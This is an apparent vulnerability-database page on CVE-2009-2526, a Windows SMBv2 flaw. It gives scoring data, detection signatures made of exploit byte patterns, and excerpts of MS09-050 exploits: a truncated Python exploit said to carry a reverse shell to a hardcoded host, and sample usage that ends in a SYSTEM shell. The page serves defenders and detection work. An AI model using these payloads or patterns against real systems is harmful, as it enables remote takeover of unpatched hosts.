CVE-2009-2526
Published 2009-10-14
Priority P2 · 72 · CVSS 2.0 7.8 high
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C
Exploited in the wild (ITW exploit) · VulnCheck KEV
EPSS: 81.89% (99.6th percentile)
Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 do not properly validate fields in SMBv2 packets, which allows remote attackers to cause a denial of service (infinite loop and system hang) via a crafted packet to the Server service, aka "SMBv2 Infinite Loop Vulnerability."
Detection & IOCs (extracted from sources)
- bytes: \xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x53\xc8
- bytes: \x00\x02\x53\x4d\x42\x20\x32\x2e\x30\x30\x32\x00
- bytes: \x04\x0d\xdf\xff (repeated 25 times)
- bytes: \xb4\xff\xff\x3f
- bytes: \x09\x0d\xd0\xff
- Detect oversized or malformed SMBv2 Negotiate packets targeting srv2.sys: the exploit sends a crafted ~926-byte (0x039e) NetBIOS-framed SMB packet to TCP/445 containing the SMB2 dialect string '\x53\x4d\x42\x20\x32\x2e\x30\x30\x32' and the 4-byte pattern '\x04\x0d\xdf\xff' repeated 25 times.
- Monitor for unexpected listening ports opened on victim Windows Vista/Server 2008 hosts, specifically TCP/28876, which the exploit spawns as a backdoor shell.
- The exploit requires a follow-up SMB authentication event to trigger the injected shellcode; monitor for rpcclient or anonymous/low-credential SMB authentication attempts immediately after a large malformed SMBv2 Negotiate packet from the same source IP.
- Look for SMBv2 Negotiate packets with ProcessID field anomalies (high process ID bytes '\x17\x02') combined with oversized payloads; together these are indicative of the ProcessID Function Table Dereference exploitation technique.
- The stager shellcode contains the sysenter hook trampoline signature starting with '\xfc\xfa\xeb\x1e\x5e'; detect this byte sequence in SMB packet payloads.
- The Python exploit (EDB-40280) hardcodes a Meterpreter reverse_tcp shellcode connecting back to LHOST=192.168.30.77 on LPORT=443; defenders should treat these as example values only, since real-world use will substitute attacker-controlled IPs/ports.
- The binary exploit (EDB-14674) targets Vista SP1 and SP2 only and is described as reliable only for those versions; it was not updated after initial creation and may not work against the other affected versions listed in the CVE (Server 2008 Gold/SP2).
CVSS provenance
- nvd (v2.0): 7.8 HIGH, AV:N/AC:L/Au:N/C:N/I:N/A:C
- vulncheck: 7.8 HIGH
GHSA
GHSA-6cf2-g5cm-mr2w (ghsa_unreviewed · 2022-05-02) · CVE-2009-2526 [HIGH]
Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 do not properly validate fields in SMBv2 packets, which allows remote attackers to cause a denial of service (infinite loop and system hang) via a crafted packet to the Server service, aka "SMBv2 Infinite Loop Vulnerability."
VulnCheck
Microsoft Windows Mitigating Factors for SMBv2 Infinite Loop (vulncheck · 2009 · CVSS 7.8) · CVE-2009-2526 [HIGH]
Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 do not properly validate fields in SMBv2 packets, which allows remote attackers to cause a denial of service (infinite loop and system hang) via a crafted packet to the Server service, aka "SMBv2 Infinite Loop Vulnerability."
Affected: Microsoft Windows
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=a9c54f79-d780-437b-a7f5-a74960e299d5&CommunityKey=8af7f28f-02f1-4107-8639-93a60b6546d4&tab=librarydocuments
No detection rules found.
Exploit-DB
Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050) (exploitdb · 2016-02-26 · CVE-2009-3103)
---
```python
# EDB-Note: Source ~ https://raw.githubusercontent.com/ohnozzy/Exploit/master/MS09_050.py
#!/usr/bin/python
# This module depends on the Linux command line program smbclient.
# I can't find a Python SMB library for SMB login. If you can find one, you can replace that part of the code with the SMB login function in Python.
# The idea is that after the evil payload is injected by the first packet, it needs to be triggered by an authentication event. Whether the authentication succeeds or not does not matter.
import tempfile
import sys
import subprocess
from socket import socket
from time import sleep
from smb.SMBConnection import SMBConnection
try:
    target = sys.argv[1]
except IndexError:
    print '\nUsage: %s \n' % sys.a
```
Exploit-DB
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (exploitdb · 2010-08-17 · CVE-2009-3103)
---
Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
Exploited by Piotr Bania // www.piotrbania.com
Exploit for Vista SP2/SP1 only, should be reliable!
Tested on:
- Vista SP2 (6.0.6002.18005)
- Vista SP1 Ultimate (6.0.6001.18000)
Kudos for:
Stephen, HDM, Laurent Gaffie (bug) and all the mates I know, peace.
Special kudos for prdelka for testing this shit and all the hosters.
Sample usage:
```
> smb2_exploit.exe 192.167.0.5 45 0
> telnet 192.167.0.5 28876
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>
```
When all is done it should spawn a port TARGET_IP:2
No writeups or analysis indexed.
References
- http://www.us-cert.gov/cas/techalerts/TA09-286A.html
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-050
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A5595